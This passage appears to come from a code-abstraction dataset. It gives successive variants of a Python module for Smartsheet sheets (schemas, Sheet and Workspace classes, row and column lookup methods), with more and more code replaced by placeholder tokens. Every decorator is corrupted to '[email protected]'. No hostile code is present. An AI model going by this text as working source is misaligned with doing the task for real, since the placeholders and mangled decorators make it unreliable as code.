user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), 
init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
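Reading build_index together with get_row/get_rows suggests the in-memory layout of Sheet.indexes: keys are tuples of column titles, and each value holds the unique flag plus the lookup table that rows fill in through _update_index. The shape below is an inference from this code rather than a documented API, and the titles are placeholders:

# Inferred shape only: unique indexes map a query tuple to a single Row,
# non-unique indexes map it to a list of Rows ("<Row>" strings stand in for objects).
inferred_indexes = {
    ("Email",): {"unique": True, "index": {("alice@example.com",): "<Row>"}},
    ("Company",): {"unique": False, "index": {("ACME",): ["<Row>", "<Row>"]}},
}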
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] 
= attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
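Besides filter-based lookups, `get_row` and `get_column` in the record above support direct lookups by row number, row ID, column title, or column ID, and raise `ValueError` when no argument is supplied. A small sketch, again assuming a loaded `sheet` instance; the numeric IDs are placeholders:

# Sketch only: IDs below are placeholders, not real Smartsheet IDs.
first_row = sheet.get_row(row_num=1)            # served from _row_num_to_row
row_by_id = sheet.get_row(row_id=1234567890)    # served from _row_id_to_row

status_col = sheet.get_column(column_title="Status")   # title lookup, case-sensitive
col_by_id = sheet.get_column(column_id=9876543210)     # ID lookup

# Calling either method with no arguments raises ValueError.
try:
    sheet.get_column()
except ValueError as exc:
    print(exc)

Note that title and ID lookups go through plain dictionary indexing, so an unknown title or ID surfaces as a `KeyError` rather than returning `None`.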
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = 
attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. 
Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
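The `Sheet.make_cell` and `make_cells` helpers in the record above translate column titles into `Cell` objects, taking the `Cell.create_multi_picklist` branch when the column type is `ColumnType.MULTI_PICKLIST`. A sketch of building cells for a new or updated row, with hypothetical column titles and values:

# Sketch only: column titles and values are hypothetical; `sheet` is an
# already-loaded Sheet instance.
cells = sheet.make_cells({
    "Name": "Alice",
    "Age": 30,
    "Tags": ["red", "blue"],  # routed through Cell.create_multi_picklist
                              # when the 'Tags' column is a MULTI_PICKLIST
})

single = sheet.make_cell("Name", "Bob")  # one Cell for one existing column

One detail worth noting: because `get_column` raises `KeyError` for an unknown title, the `if column is None` ValueError branch inside `make_cell` is effectively unreachable; the only `ValueError` actually raised there is the missing-column-ID check in the multi-picklist branch.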
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass WorkspaceSchema(Schema):\n <assignment token>\n <assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = 
